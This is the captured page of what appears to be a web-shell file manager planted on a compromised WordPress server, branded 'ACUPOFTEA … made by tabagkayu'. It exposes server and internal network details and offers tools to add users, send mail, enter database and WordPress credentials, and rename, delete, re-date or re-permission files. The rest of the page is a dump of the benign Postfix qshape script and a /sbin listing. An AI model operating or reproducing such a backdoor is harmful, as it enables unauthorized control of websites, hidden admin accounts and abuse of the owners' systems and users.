System
:
Linux wordpress 7.0.14-6-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.14-6 (2026-07-20T14:45Z) x86_64
Software
:
Apache/2.4.67 (Debian)
Server
:
192.168.20.30
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
sbin
/
192.168.10.18
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for stevesummers.com.au made by tabagkayu.
Folder Name
File Name
File Content
File
qshape
#! /usr/bin/perl -w # To view the formatted manual page of this file, type: # POSTFIXSOURCE/mantools/srctoman - qshape | nroff -man #++ # NAME # qshape 1 # SUMMARY # Print Postfix queue domain and age distribution # SYNOPSIS # .fi # \fBqshape\fR [\fB-s\fR] [\fB-p\fR] [\fB-m \fImin_subdomains\fR] # [\fB-b \fIbucket_count\fR] [\fB-t \fIbucket_time\fR] # [\fB-l\fR] [\fB-w \fIterminal_width\fR] # [\fB-N \fIbatch_msg_count\fR] [\fB-n \fIbatch_top_domains\fR] # [\fB-c \fIconfig_directory\fR] [\fIqueue_name\fR ...] # DESCRIPTION # The \fBqshape\fR program helps the administrator understand the # Postfix queue message distribution in time and by sender domain # or recipient domain. The program needs read access to the queue # directories and queue files, so it must run as the superuser or # the \fBmail_owner\fR specified in \fBmain.cf\fR (typically # \fBpostfix\fR). # # Options: # .IP \fB-s\fR # Display the sender domain distribution instead of the recipient # domain distribution. By default the recipient distribution is # displayed. There can be more recipients than messages, but as # each message has only one sender, the sender distribution is a # message distribution. # .IP \fB-p\fR # Generate aggregate statistics for parent domains. Top level domains # are not shown, nor are domains with fewer than \fImin_subdomains\fR # subdomains. The names of parent domains are shown with a leading dot, # (e.g. \fI.example.com\fR). # .IP "\fB-m \fImin_subdomains\fR" # When used with the \fB-p\fR option, sets the minimum subdomain count # needed to show a separate line for a parent domain. The default is 5. # .IP "\fB-b \fIbucket_count\fR" # The age distribution is broken up into a sequence of geometrically # increasing intervals. This option sets the number of intervals # or "buckets". Each bucket has a maximum queue age that is twice # as large as that of the previous bucket. The last bucket has no # age limit. # .IP "\fB-t \fIbucket_time\fR" # The age limit in minutes for the first time bucket. The default # value is 5, meaning that the first bucket counts messages between # 0 and 5 minutes old. # .IP "\fB-l\fR" # Instead of using a geometric age sequence, use a linear age sequence, # in other words simple multiples of \fBbucket_time\fR. # # This feature is available in Postfix 2.2 and later. # .IP "\fB-w \fIterminal_width\fR" # The output is right justified, with the counts for the last # bucket shown on the 80th column, the \fIterminal_width\fR can be # adjusted for wider screens allowing more buckets to be displayed # without truncating the domain names on the left. When a row for a # full domain name and its counters does not fit in the specified # number of columns, only the last 17 bytes of the domain name # are shown with the prefix replaced by a '+' character. Truncated # parent domain rows are shown as '.+' followed by the last 16 bytes # of the domain name. If this is still too narrow to show the domain # name and all the counters, the terminal_width limit is violated. # .IP "\fB-N \fIbatch_msg_count\fR" # When the output device is a terminal, intermediate results are # shown each "batch_msg_count" messages. This produces usable results # in a reasonable time even when the deferred queue is large. The # default is to show intermediate results every 1000 messages. # .IP "\fB-n \fIbatch_top_domains\fR" # When reporting intermediate or final results to a termainal, report # only the top "batch_top_domains" domains. The default limit is 20 # domains. # .IP "\fB-c \fIconfig_directory\fR" # The \fBmain.cf\fR configuration file is in the named directory # instead of the default configuration directory. # .PP # Arguments: # .IP \fIqueue_name\fR # By default \fBqshape\fR displays the combined distribution of # the incoming and active queues. To display a different set of # queues, just list their directory names on the command line. # Absolute paths are used as is, other paths are taken relative # to the \fBmain.cf\fR \fBqueue_directory\fR parameter setting. # While \fBmain.cf\fR supports the use of \fI$variable\fR expansion # in the definition of the \fBqueue_directory\fR parameter, the # \fBqshape\fR program does not. If you must use variable expansions # in the \fBqueue_directory\fR setting, you must specify an explicit # absolute path for each queue subdirectory even if you want the # default incoming and active queue distribution. # SEE ALSO # mailq(1), List all messages in the queue. # QSHAPE_README Examples and background material. # FILES # $config_directory/main.cf, Postfix installation parameters. # $queue_directory/maildrop/, local submission directory. # $queue_directory/incoming/, new message queue. # $queue_directory/hold/, messages waiting for tech support. # $queue_directory/active/, messages scheduled for delivery. # $queue_directory/deferred/, messages postponed for later delivery. # LICENSE # .ad # .fi # The Secure Mailer license must be distributed with this software. # AUTHOR(S) # Victor Duchovni # Morgan Stanley #-- use strict; use IO::File; use File::Find; use Getopt::Std; my $cls; # Clear screen escape sequence my $batch_msg_count; # Interim result frequency my $batch_top_domains; # Interim result count my %opts; # Command line switches my %q; # domain counts for queues and buckets my %sub; # subdomain counts for parent domains my $now = time; # reference time my $bnum = 10; # deferred queue bucket count my $width = 80; # screen char width my $dwidth = 18; # min width of domain field my $tick = 5; # minutes my $minsub = 5; # Show parent domains with at least $minsub subdomains my @qlist = qw(incoming active); do { local $SIG{__WARN__} = sub { warn "$0: $_[0]" unless exists($opts{"h"}); die "Usage: $0 [ -s ] [ -p ] [ -m <min_subdomains> ] [ -l ]\n". "\t[ -b <bucket_count> ] [ -t <bucket_time> ] [ -w <terminal_width> ]\n". "\t[ -N <batch_msg_count> ] [ -n <batch_top_domains> ]\n". "\t[ -c <config_directory> ] [ <queue_name> ... ]\n". "The 's' option shows sender domain counts.\n". "The 'p' option shows address counts by for parent domains.\n". "Parent domains are shown with a leading '.' before the domain name.\n". "Parent domains are only shown if the domain is not a TLD, and at\n". "least <min_subdomains> (default 5) subdomains are shown in the output.\n\n". "The bucket age ranges in units of <bucket_time> minutes are\n". "[0,1), [1,2), [2,4), [4,8), [8, 16), ... i.e.:\n". "\tthe first bucket is [0, bucket_time) minutes\n". "\tthe second bucket is [bucket_time, 2*bucket_time) minutes\n". "\tthe third bucket is [2*bucket_time, 4*bucket_time) minutes...\n". "'-l' makes the ages linear, the number of buckets shown is <bucket_count>\n\n". "The default summary is for the incoming and active queues. An explicit\n". "list of queue names can be given on the command line. Non-absolute queue\n". "names are interpreted relative to the Postfix queue directory. Use\n". "<config_directory> to specify a non-default Postfix instance. Values of\n". "the main.cf queue_directory parameter that use variable expansions are\n". "not supported. If necessary, use explicit absolute paths for all queues.\n"; }; getopts("lhc:psw:b:t:m:n:N:", \%opts); warn "Help message" if (exists $opts{"h"}); @qlist = @ARGV if (@ARGV > 0); # The -c option specifies the configuration directory, # it is not used if all queue names are absolute. # foreach (@qlist) { next if (m{^/}); $ENV{q{MAIL_CONFIG}} = $opts{"c"} if (exists $opts{"c"}); chomp(my $qdir = qx{postconf -h queue_directory}); die "$0: postconf failed\n" if ($? != 0); warn "'queue_directory' variable expansion not supported: $qdir\n" if ($qdir =~ /\$/); chdir($qdir) or die "$0: chdir($qdir): $!\n"; last; } }; $width = $opts{"w"} if (exists $opts{"w"} && $opts{"w"} > 80); $bnum = $opts{"b"} if (exists $opts{"b"} && $opts{"b"} > 0); $tick = $opts{"t"} if (exists $opts{"t"} && $opts{"t"} > 0); $minsub = $opts{"m"} if (exists $opts{"m"} && $opts{"m"} > 0); if ( -t STDOUT ) { $batch_msg_count = 1000 unless defined($batch_msg_count = $opts{"N"}); $batch_top_domains = 20 unless defined ($batch_top_domains = $opts{"n"}); $cls = `clear`; } else { $batch_msg_count = 0; $batch_top_domains = 0; $cls = ""; } sub rec_get { my ($h) = @_; my $r = getc($h) || return; my $l = 0; my $shift = 0; while (defined(my $lb = getc($h))) { my $o = ord($lb); $l |= ($o & 0x7f) << $shift ; last if (($o & 0x80) == 0); $shift += 7; return if ($shift > 14); # XXX: max rec len of 2097151 } my $d = ""; return unless ($l == 0 || read($h,$d,$l) == $l); ($r, $l, $d); } sub qenv { my ($qfile) = @_; return unless $qfile =~ m{(^|/)[A-Za-z0-9]{6,}$}; my @st = lstat($qfile); return unless (@st > 0 && -f _ && (($st[2] & 0733) == 0700)); my $h = new IO::File($qfile, "r") || return; my ($t, $s, @r, $dlen); my ($r, $l, $d) = rec_get($h); if ($r eq "C") { # XXX: Sanity check, the first record type is REC_TYPE_SIZE (C) # if the file is proper queue file written by "cleanup", in # this case the second record is always REC_TYPE_TIME. # $dlen = $1 if ($d =~ /^\s*(\d+)\s+\d+\s+\d+/); ($r, $l, $d) = rec_get($h); return unless (defined $r && $r eq "T"); ($t) = split(/\s+/, $d); } elsif ($r eq "S" || $r eq "F") { # For embryonic queue files in the "maildrop" directory the first # record is either a REC_TYPE_FULL (F) followed by REC_TYPE_FROM # or an immediate REC_TYPE_FROM (S). In either case there is no # REC_TYPE_TIME and we get the timestamp via lstat(). # $t = $st[9]; if ($r ne "S") { ($r, $l, $d) = rec_get($h); return unless (defined $r && $r eq "S"); } $s = $d; } else { # XXX: Not a valid queue file! # return undef; } while (my ($r, $l, $d) = rec_get($h)) { if ($r eq "p" && $d > 0) { seek($h, $d, 0) or return (); # follow pointer } if ($r eq "R") { push(@r, $d); } elsif ($r eq "S") { $s = $d; } elsif ($r eq "M") { last unless (defined($s)); if (defined($dlen)) { seek($h, $dlen, 1) or return (); # skip content ($r, $l, $d) = rec_get($h); } else { while ((($r, $l, $d) = rec_get($h)) && ($r =~ /^[NLp]$/)) { if ($r eq "p" && $d > 0) { seek($h, $d, 0) or return (); # follow pointer } } } return unless (defined($r) && $r eq "X"); } elsif ($r eq "E") { last unless (defined($t) && defined($s) && @r); return ($t, $s, @r); } } return (); } # bucket 0 is the total over all the buckets. # buckets 1 to $bnum contain the age breakdown. # sub bucket { my ($qt, $now) = @_; my $m = ($now - $qt) / (60 * $tick); return 1 if ($m < 1); my $b = $opts{"l"} ? int($m+1) : 2 + int(log($m) / log(2)); $b < $bnum ? $b : $bnum; } # Collate by age of message in the selected queues. # my $msgs; sub wanted { if (my ($t, $s, @r) = qenv($_)) { my $b = bucket($t, $now); foreach my $a (map {lc($_)} ($opts{"s"} ? ($s) : @r)) { ++$q{"TOTAL"}->[0]; ++$q{"TOTAL"}->[$b]; $a = "MAILER-DAEMON" if ($a eq ""); $a =~ s/.*\@//; $a =~ s/\.\././g; $a =~ s/\.?(.+?)\.?$/$1/; my $new = 0; do { my $old = (++$q{$a}->[0] > 1); ++$q{$a}->[$b]; ++$sub{$a} if ($new); $new = ! $old; } while ($opts{"p"} && $a =~ s/^(?:\.)?[^.]+\.(.*\.)/.$1/); } if ($batch_msg_count > 0 && ++$msgs % $batch_msg_count == 0) { results(); } } } my @heads; my $fmt; my $dw; sub pdomain { my ($d, @count) = @_; foreach ((0 .. $bnum)) { $count[$_] ||= 0; } my $len = length($d); if ($len > $dw) { if (substr($d, 0, 1) eq ".") { print ".+",substr($d, $len-$dw+2, $dw-2); } else { print "+",substr($d, $len-$dw+1, $dw-1); } } else { print (" " x ($dw - $len), $d); } printf "$fmt\n", @count; } sub results { @heads = (); $dw = $width; $fmt = ""; for (my $i = 0, my $t = 0; $i <= $bnum; ) { $q{"TOTAL"}->[$i] ||= 0; my $l = length($q{"TOTAL"}->[$i]); my $h = ($i == 0) ? "T" : $t; $l = length($h) if (length($h) >= $l); $l = ($l > 2) ? $l + 1 : 3; push(@heads, $h); $fmt .= sprintf "%%%ds", $l; $dw -= $l; if (++$i < $bnum) { $t += ($t && !$opts{"l"}) ? $t : $tick; } else { $t = "$t+"; } } $dw = $dwidth if ($dw < $dwidth); print $cls if ($batch_msg_count > 0); # Print headings # pdomain("", @heads); my $n = 0; # Show per-domain totals # foreach my $d (sort { $q{$b}->[0] <=> $q{$a}->[0] || length($a) <=> length($b) } keys %q) { # Skip parent domains with < $minsub subdomains. # next if ($d =~ /^\./ && $sub{$d} < $minsub); last if ($batch_top_domains > 0 && ++$n > $batch_top_domains); pdomain($d, @{$q{$d}}); } } find(\&wanted, @qlist); results();
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-06-18 12:53:59
..
DIR
-
drwxr-xr-x
2025-10-01 02:43:15
a2disconf
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2dismod
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2dissite
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2enconf
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2enmod
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2ensite
text/x-perl
15.75 KB
-rwxr-xr-x
2026-06-03 02:17:04
a2query
text/x-perl
9.6 KB
-rwxr-xr-x
2026-06-05 10:55:53
accessdb
application/x-pie-executable
14.46 KB
-rwxr-xr-x
2025-05-02 01:24:27
add-shell
text/x-shellscript
1.03 KB
-rwxr-xr-x
2025-07-27 11:01:22
addgnupghome
text/x-shellscript
3 KB
-rwxr-xr-x
2026-05-09 11:39:37
addgroup
text/x-perl
58.03 KB
-rwxr-xr-x
2025-05-06 06:25:46
adduser
text/x-perl
58.03 KB
-rwxr-xr-x
2025-05-06 06:25:46
agetty
application/x-pie-executable
107.57 KB
-rwxr-xr-x
2025-05-09 10:54:07
apache2
application/x-pie-executable
724.53 KB
-rwxr-xr-x
2026-06-05 10:55:53
apache2ctl
text/x-shellscript
7.26 KB
-rwxr-xr-x
2026-06-05 10:51:48
apachectl
text/x-shellscript
7.26 KB
-rwxr-xr-x
2026-06-05 10:51:48
applygnupgdefaults
text/x-shellscript
2.17 KB
-rwxr-xr-x
2026-05-09 11:39:37
arpd
application/x-pie-executable
110.55 KB
-rwxr-xr-x
2025-05-26 11:16:26
badblocks
application/x-pie-executable
34.25 KB
-rwxr-xr-x
2026-05-09 11:36:41
biosdecode
application/x-pie-executable
27.13 KB
-rwxr-xr-x
2024-11-15 05:41:58
blkdiscard
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
blkid
application/x-pie-executable
138.41 KB
-rwxr-xr-x
2025-05-09 10:54:07
blkpr
application/x-pie-executable
38.39 KB
-rwxr-xr-x
2025-05-09 10:54:07
blkzone
application/x-pie-executable
90.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
blockdev
application/x-pie-executable
94.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
bridge
application/x-pie-executable
170.62 KB
-rwxr-xr-x
2025-05-26 11:16:26
capsh
application/x-pie-executable
53.32 KB
-rwxr-xr-x
2026-05-07 09:57:24
cfdisk
application/x-pie-executable
110.74 KB
-rwxr-xr-x
2025-05-09 10:54:07
chcpu
application/x-pie-executable
46.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
check_forensic
text/x-shellscript
952 B
-rwxr-xr-x
2011-04-26 03:10:00
chgpasswd
application/x-pie-executable
66.42 KB
-rwxr-xr-x
2025-04-19 10:20:28
chmem
application/x-pie-executable
70.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
chpasswd
application/x-pie-executable
95.09 KB
-rwxr-xr-x
2025-04-19 10:20:28
chroot
application/x-pie-executable
50.41 KB
-rwxr-xr-x
2025-06-04 03:14:05
cron
application/x-pie-executable
58.66 KB
-rwxr-xr-x
2025-06-13 08:30:37
ctrlaltdel
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
dbconfig-generate-include
text/x-shellscript
12.36 KB
-rwxr-xr-x
2025-04-27 12:58:00
dbconfig-load-include
text/x-shellscript
5.57 KB
-rwxr-xr-x
2025-04-27 12:58:00
dcb
application/x-pie-executable
170.67 KB
-rwxr-xr-x
2025-05-26 11:16:26
debugfs
application/x-pie-executable
249.83 KB
-rwxr-xr-x
2026-05-09 11:36:41
delgroup
text/x-perl
20.71 KB
-rwxr-xr-x
2025-05-06 06:25:46
deluser
text/x-perl
20.71 KB
-rwxr-xr-x
2025-05-06 06:25:46
depmod
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
devlink
application/x-pie-executable
239.05 KB
-rwxr-xr-x
2025-05-26 11:16:26
dhclient
application/x-pie-executable
2.65 MB
-rwxr-xr-x
2025-05-03 05:16:14
dhclient-script
text/x-shellscript
14.29 KB
-rwxr-xr-x
2025-05-03 05:16:14
dhcpcd
application/x-pie-executable
379.31 KB
-rwxr-xr-x
2025-12-25 09:40:14
dmidecode
application/x-pie-executable
139.27 KB
-rwxr-xr-x
2024-11-15 05:41:58
dpkg-preconfigure
text/x-perl
4.46 KB
-rwxr-xr-x
2025-03-10 12:07:15
dpkg-reconfigure
text/x-perl
4.43 KB
-rwxr-xr-x
2025-03-10 12:07:15
dumpe2fs
application/x-pie-executable
30.31 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2freefrag
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2fsck
application/x-pie-executable
352.42 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2image
application/x-pie-executable
54.45 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2label
application/x-pie-executable
118.52 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2mmpstatus
application/x-pie-executable
30.31 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2scrub
text/x-shellscript
7.36 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2scrub_all
text/x-shellscript
4.91 KB
-rwxr-xr-x
2026-05-09 11:36:41
e2undo
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-05-09 11:36:41
e4crypt
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-05-09 11:36:41
e4defrag
application/x-pie-executable
34.23 KB
-rwxr-xr-x
2026-05-09 11:36:41
faillock
application/x-pie-executable
22.24 KB
-rwxr-xr-x
2025-06-29 05:40:46
fdisk
application/x-pie-executable
174.43 KB
-rwxr-xr-x
2025-05-09 10:54:07
filefrag
application/x-pie-executable
18.26 KB
-rwxr-xr-x
2026-05-09 11:36:41
findfs
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
fsck
application/x-pie-executable
58.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
fsck.cramfs
application/x-pie-executable
46.45 KB
-rwxr-xr-x
2025-05-09 10:54:07
fsck.ext2
application/x-pie-executable
352.42 KB
-rwxr-xr-x
2026-05-09 11:36:41
fsck.ext3
application/x-pie-executable
352.42 KB
-rwxr-xr-x
2026-05-09 11:36:41
fsck.ext4
application/x-pie-executable
352.42 KB
-rwxr-xr-x
2026-05-09 11:36:41
fsck.minix
application/x-pie-executable
138.41 KB
-rwxr-xr-x
2025-05-09 10:54:07
fsfreeze
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
fstab-decode
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2025-03-10 04:49:51
fstrim
application/x-pie-executable
86.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
genl
application/x-pie-executable
126.59 KB
-rwxr-xr-x
2025-05-26 11:16:26
getcap
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-05-07 09:57:24
getpcaps
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-05-07 09:57:24
getty
application/x-pie-executable
107.57 KB
-rwxr-xr-x
2025-05-09 10:54:07
groupadd
application/x-pie-executable
103.16 KB
-rwxr-xr-x
2025-04-19 10:20:28
groupdel
application/x-pie-executable
90.99 KB
-rwxr-xr-x
2025-04-19 10:20:28
groupmod
application/x-pie-executable
103.15 KB
-rwxr-xr-x
2025-04-19 10:20:28
grpck
application/x-pie-executable
62.43 KB
-rwxr-xr-x
2025-04-19 10:20:28
grpconv
application/x-pie-executable
58.27 KB
-rwxr-xr-x
2025-04-19 10:20:28
grpunconv
application/x-pie-executable
58.27 KB
-rwxr-xr-x
2025-04-19 10:20:28
halt
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
httxt2dbm
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-06-05 10:55:53
hwclock
application/x-pie-executable
94.4 KB
-rwxr-xr-x
2025-05-09 10:54:07
iconvconfig
application/x-pie-executable
30.4 KB
-rwxr-xr-x
2026-04-27 08:09:22
ifdown
text/x-script.python
4.16 KB
-rwxr-xr-x
2020-08-28 02:01:19
ifquery
text/x-script.python
4.16 KB
-rwxr-xr-x
2020-08-28 02:01:19
ifreload
text/x-script.python
4.16 KB
-rwxr-xr-x
2020-08-28 02:01:19
ifup
text/x-script.python
4.16 KB
-rwxr-xr-x
2020-08-28 02:01:19
init
application/x-pie-executable
130.38 KB
-rwxr-xr-x
2026-04-13 07:38:05
insmod
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
installkernel
text/x-shellscript
2.65 KB
-rwxr-xr-x
2025-07-27 11:01:22
invoke-rc.d
text/x-shellscript
16.13 KB
-rwxr-xr-x
2022-07-04 10:14:09
ip
application/x-pie-executable
704.99 KB
-rwxr-xr-x
2025-05-26 11:16:26
isosize
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
killall5
application/x-pie-executable
26.31 KB
-rwxr-xr-x
2025-03-10 04:49:51
ldattach
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
ldconfig
application/x-pie-executable
965.01 KB
-rwxr-xr-x
2026-04-27 08:09:22
locale-gen
text/x-shellscript
1.52 KB
-rwxr-xr-x
2026-04-27 08:09:22
logrotate
application/x-pie-executable
90.16 KB
-rwxr-xr-x
2024-07-14 04:30:23
logsave
application/x-pie-executable
14.09 KB
-rwxr-xr-x
2026-05-09 11:36:41
losetup
application/x-pie-executable
130.53 KB
-rwxr-xr-x
2025-05-09 10:54:07
lsmod
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
make-ssl-cert
text/x-shellscript
6.65 KB
-rwxr-xr-x
2024-08-04 09:38:36
mariadbd
application/x-pie-executable
27 MB
-rwxr-xr-x
2026-03-06 01:13:13
mke2fs
application/x-pie-executable
142.58 KB
-rwxr-xr-x
2026-05-09 11:36:41
mkfs
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
mkfs.bfs
application/x-pie-executable
38.39 KB
-rwxr-xr-x
2025-05-09 10:54:07
mkfs.cramfs
application/x-pie-executable
50.32 KB
-rwxr-xr-x
2025-05-09 10:54:07
mkfs.ext2
application/x-pie-executable
142.58 KB
-rwxr-xr-x
2026-05-09 11:36:41
mkfs.ext3
application/x-pie-executable
142.58 KB
-rwxr-xr-x
2026-05-09 11:36:41
mkfs.ext4
application/x-pie-executable
142.58 KB
-rwxr-xr-x
2026-05-09 11:36:41
mkfs.minix
application/x-pie-executable
126.4 KB
-rwxr-xr-x
2025-05-09 10:54:07
mkhomedir_helper
application/x-pie-executable
14.26 KB
-rwxr-xr-x
2025-06-29 05:40:46
mklost+found
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-05-09 11:36:41
mkswap
application/x-pie-executable
134.39 KB
-rwxr-xr-x
2025-05-09 10:54:07
modinfo
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
modprobe
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
mysqld
application/x-pie-executable
27 MB
-rwxr-xr-x
2026-03-06 01:13:13
newusers
application/x-pie-executable
106.97 KB
-rwxr-xr-x
2025-04-19 10:20:28
nft
application/x-pie-executable
26.15 KB
-rwxr-xr-x
2025-06-10 08:18:17
nologin
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
ownership
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2024-11-15 05:41:58
pam-auth-update
text/x-perl
20.94 KB
-rwxr-xr-x
2025-06-29 05:40:46
pam_getenv
text/x-perl
2.82 KB
-rwxr-xr-x
2025-06-29 05:40:46
pam_namespace_helper
text/x-shellscript
467 B
-rwxr-xr-x
2025-06-29 05:40:46
pam_timestamp_check
application/x-pie-executable
14.24 KB
-rwxr-xr-x
2025-06-29 05:40:46
paperconfig
text/x-shellscript
3.55 KB
-rwxr-xr-x
2024-12-10 08:10:29
php-fpm8.4
application/x-pie-executable
5.77 MB
-rwxr-xr-x
2026-06-06 06:50:35
phpdismod
text/x-shellscript
7.11 KB
-rwxr-xr-x
2026-05-03 07:49:41
phpenmod
text/x-shellscript
7.11 KB
-rwxr-xr-x
2026-05-03 07:49:41
phpquery
text/x-shellscript
6.24 KB
-rwxr-xr-x
2026-05-03 07:49:41
pivot_root
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
postalias
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2025-10-28 10:24:35
postcat
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2025-10-28 10:24:35
postconf
application/x-pie-executable
195.82 KB
-rwxr-xr-x
2025-10-28 10:24:35
postdrop
application/x-pie-executable
22.35 KB
-r-xr-sr-x
2025-10-28 10:24:35
postfix
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2025-10-28 10:24:35
postfix-add-filter
text/x-script.python
4.84 KB
-rwxr-xr-x
2025-10-28 10:24:35
postfix-add-policy
text/x-script.python
3.77 KB
-rwxr-xr-x
2025-10-28 10:24:35
postfix-collate
text/x-perl
3.17 KB
-rwxr-xr-x
2025-10-28 10:24:35
postkick
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2025-10-28 10:24:35
postlock
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2025-10-28 10:24:35
postlog
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-10-28 10:24:35
postmap
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2025-10-28 10:24:35
postmulti
application/x-pie-executable
30.62 KB
-rwxr-xr-x
2025-10-28 10:24:35
postqueue
application/x-pie-executable
22.3 KB
-r-xr-sr-x
2025-10-28 10:24:35
postsuper
application/x-pie-executable
30.52 KB
-rwxr-xr-x
2025-10-28 10:24:35
posttls-finger
application/x-pie-executable
42.31 KB
-rwxr-xr-x
2025-10-28 10:24:35
poweroff
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
pwck
application/x-pie-executable
58.38 KB
-rwxr-xr-x
2025-04-19 10:20:28
pwconv
application/x-pie-executable
54.26 KB
-rwxr-xr-x
2025-04-19 10:20:28
pwhistory_helper
application/x-pie-executable
22.24 KB
-rwxr-xr-x
2025-06-29 05:40:46
pwunconv
application/x-pie-executable
54.27 KB
-rwxr-xr-x
2025-04-19 10:20:28
qmqp-sink
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2025-10-28 10:24:35
qmqp-source
application/x-pie-executable
22.24 KB
-rwxr-xr-x
2025-10-28 10:24:35
qshape
text/x-perl
12.54 KB
-rwxr-xr-x
2025-10-28 10:24:35
readprofile
application/x-pie-executable
34.42 KB
-rwxr-xr-x
2025-05-09 10:54:07
reboot
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
remove-shell
text/x-shellscript
1.08 KB
-rwxr-xr-x
2025-07-27 11:01:22
resize2fs
application/x-pie-executable
62.3 KB
-rwxr-xr-x
2026-05-09 11:36:41
rmail
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2025-10-28 10:24:35
rmmod
application/x-pie-executable
170.24 KB
-rwxr-xr-x
2025-04-25 09:50:41
rmt
application/x-pie-executable
63.19 KB
-rwxr-xr-x
2024-12-18 02:37:14
rmt-tar
application/x-pie-executable
63.19 KB
-rwxr-xr-x
2024-12-18 02:37:14
rtacct
application/x-pie-executable
114.53 KB
-rwxr-xr-x
2025-05-26 11:16:26
rtcwake
application/x-pie-executable
54.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
rtmon
application/x-pie-executable
118.52 KB
-rwxr-xr-x
2025-05-26 11:16:26
runlevel
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
runuser
application/x-pie-executable
82.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
sendmail
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2025-10-28 10:24:35
service
text/x-shellscript
9 KB
-rwxr-xr-x
2025-08-20 01:39:01
setcap
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-05-07 09:57:24
sfdisk
application/x-pie-executable
158.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
shadowconfig
text/x-shellscript
1.94 KB
-rwxr-xr-x
2025-04-19 10:15:06
shutdown
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
smtp-sink
application/x-pie-executable
35.2 KB
-rwxr-xr-x
2025-10-28 10:24:35
smtp-source
application/x-pie-executable
30.25 KB
-rwxr-xr-x
2025-10-28 10:24:35
split-logfile
text/x-perl
2.36 KB
-rwxr-xr-x
2026-06-05 10:55:53
sshd
application/x-pie-executable
554.91 KB
-rwxr-xr-x
2026-05-06 12:33:32
start-stop-daemon
application/x-pie-executable
43.42 KB
-rwxr-xr-x
2026-03-06 03:01:23
sudo_logsrvd
application/x-pie-executable
313.16 KB
-rwxr-xr-x
2026-04-11 12:21:02
sudo_sendlog
application/x-pie-executable
191.76 KB
-rwxr-xr-x
2026-04-11 12:21:02
sulogin
application/x-pie-executable
58.39 KB
-rwxr-xr-x
2025-05-09 10:54:07
swaplabel
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
swapoff
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
swapon
application/x-pie-executable
58.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
switch_root
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
sysctl
application/x-pie-executable
30.31 KB
-rwxr-xr-x
2025-07-30 11:58:40
tarcat
text/x-shellscript
936 B
-rwxr-xr-x
2024-12-18 02:37:14
tc
application/x-pie-executable
579.7 KB
-rwxr-xr-x
2025-05-26 11:16:26
tcptraceroute
text/x-shellscript
1.56 KB
-rwxr-xr-x
2024-09-18 05:25:15
tcptraceroute.db
text/x-shellscript
1.56 KB
